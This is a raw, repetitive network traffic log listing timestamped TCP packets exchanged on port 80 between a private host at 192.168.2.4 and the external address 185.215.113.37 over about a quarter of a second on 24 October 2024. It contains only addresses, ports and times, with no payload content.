Oct 24, 2024 19:29:08.353416920 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:08.353446960 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:08.353503942 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:08.353519917 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:08.353534937 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:08.353549957 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:08.353552103 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:08.353596926 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:08.353694916 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:08.353708982 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:08.353732109 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:08.353745937 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:08.353756905 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:08.353774071 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:08.353785992 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:08.353795052 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:08.353815079 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:08.353837967 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:08.353892088 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:08.353904009 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:08.353934050 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:08.353948116 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:08.353965044 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:08.353992939 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:08.354020119 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:08.354023933 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:08.354039907 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:08.354074955 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:08.354099035 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:08.354263067 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:08.354279041 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:08.354299068 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:08.354326010 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:08.354326963 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:08.354326963 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:08.354345083 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:08.354352951 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:08.354360104 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:08.354384899 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:08.354409933 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:08.354535103 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:08.354549885 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:08.354563951 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:08.354583025 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:08.354621887 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:08.354720116 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:08.354749918 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:08.354764938 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:08.354779005 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:08.354784966 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:08.354796886 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:08.354813099 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:08.354830027 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:08.354832888 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:08.354851007 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:08.354888916 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:08.354888916 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:08.354917049 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:08.354954958 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:08.358185053 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:08.358201027 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:08.358215094 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:08.358266115 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:08.358299971 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:08.358321905 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:08.358372927 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:08.358491898 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:08.358508110 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:08.358522892 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:08.358540058 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:08.358547926 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:08.358556986 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:08.358577967 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:08.358617067 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:08.358660936 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:08.358676910 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:08.358690977 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:08.358706951 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:08.358712912 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:08.358725071 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:08.358735085 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:08.358782053 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:08.358824015 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:08.358841896 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:08.358858109 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:08.358870029 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:08.358874083 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:08.358891010 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:08.358910084 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:08.358949900 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:08.358997107 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:08.359009981 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:08.359025002 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:08.359040022 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:08.359041929 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:08.359057903 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:08.359081030 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:08.359121084 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:08.359158993 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:08.359180927 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:08.359198093 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:08.359203100 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:08.359215021 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:08.359232903 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:08.359249115 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:08.359256029 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:08.359283924 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:08.359316111 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:08.359328985 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:08.359347105 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:08.359364033 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:08.359375954 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:08.359380007 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:08.359401941 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:08.359433889 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:08.359468937 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:08.359493017 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:08.359509945 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:08.359514952 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:08.359527111 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:08.359539032 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:08.359544039 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:08.359559059 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:08.359575033 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:08.359591007 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:08.359606981 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:08.359616995 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:08.359625101 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:08.359679937 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:08.359679937 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:08.359689951 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:08.359689951 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:08.385449886 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:08.385484934 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:08.385502100 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:08.385518074 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:08.385533094 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:08.385560036 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:08.385575056 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:08.385581970 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:08.385633945 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:08.385638952 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:08.385658026 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:08.385674953 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:08.385689974 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:08.385690928 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:08.385736942 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:08.385773897 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:08.385823011 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:08.470238924 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:08.470288992 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:08.470304966 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:08.470328093 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:08.470361948 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:08.470536947 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:08.470552921 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:08.470570087 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:08.470587015 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:08.470601082 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:08.470630884 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:08.470634937 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:08.470678091 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:08.470685005 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:08.470704079 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:08.470716953 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:08.470741987 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:08.470761061 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:08.470777988 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:08.470793962 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:08.470805883 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:08.470861912 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:08.470917940 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:08.470933914 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:08.470948935 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:08.470966101 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:08.470973969 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:08.471016884 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:08.471045017 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:08.471076965 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:08.471093893 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:08.471115112 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:08.471121073 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:08.471138000 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:08.471158028 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:08.471160889 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:08.471174002 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:08.471196890 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:08.471225977 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:08.471663952 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:08.471681118 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:08.471694946 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:08.471713066 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:08.471721888 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:08.471733093 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:08.471745968 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:08.471750021 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:08.471761942 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:08.471791029 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:08.471817017 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:08.471996069 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:08.472017050 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:08.472033978 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:08.472048998 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:08.472049952 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:08.472069979 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:08.472115993 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:08.472135067 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:08.472260952 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:08.472280979 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:08.472310066 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:08.472311974 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:08.472351074 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:08.472354889 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:08.472381115 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:08.472393990 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:08.472399950 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:08.472414017 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:08.472429991 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:08.472434998 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:08.472446918 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:08.472462893 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:08.472464085 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:08.472479105 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:08.472495079 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:08.472512007 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:08.472512960 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:08.472527981 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:08.472538948 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:08.472546101 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:08.472563028 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:08.472572088 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:08.472579956 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:08.472599030 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:08.472645044 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:08.472650051 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:08.472666979 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:08.472683907 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:08.472693920 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:08.472733974 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:08.472742081 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:08.472757101 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:08.472773075 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:08.472789049 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:08.472796917 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:08.472843885 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:08.472871065 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:08.472886086 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:08.472901106 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:08.472915888 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:08.472918987 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:08.472964048 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:08.472985029 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:08.473001003 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:08.473016024 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:08.473026991 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:08.473031998 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:08.473048925 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:08.473072052 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:08.473118067 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:08.473123074 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:08.473140001 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:08.473155975 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:08.473171949 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:08.473179102 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:08.473211050 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:08.473225117 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:08.473238945 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:08.473252058 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:08.473253965 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:08.473278999 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:08.473294020 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:08.473301888 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:08.473340988 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:08.473388910 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:08.473411083 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:08.473427057 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:08.473432064 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:08.473443031 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:08.473459959 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:08.473470926 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:08.473474979 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:08.473491907 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:08.473519087 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:08.473546982 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:08.473550081 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:08.473567009 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:08.473582983 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:08.473592043 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:08.473599911 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:08.473614931 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:08.473618031 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:08.473648071 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:08.473690033 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:08.473690987 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:08.473706007 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:08.473721981 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:08.473737001 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:08.473737955 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:08.473773956 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:08.473789930 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:08.473809958 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:08.473819971 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:08.473835945 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:08.473850965 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:08.473851919 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:08.473885059 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:08.473922014 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:08.502777100 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:08.502806902 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:08.502823114 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:08.502839088 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:08.502854109 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:08.502877951 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:08.502892971 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:08.502902031 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:08.502938032 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:08.502989054 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:08.512736082 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:08.512792110 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:08.512808084 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:08.512824059 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:08.512840986 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:08.512842894 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:08.512856960 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:08.512871981 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:08.512875080 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:08.512921095 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:08.603024960 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:08.603054047 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:08.603066921 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:08.603112936 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:08.603128910 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:08.603174925 CEST	80	49730	185.215.113.37	192.168.2.4
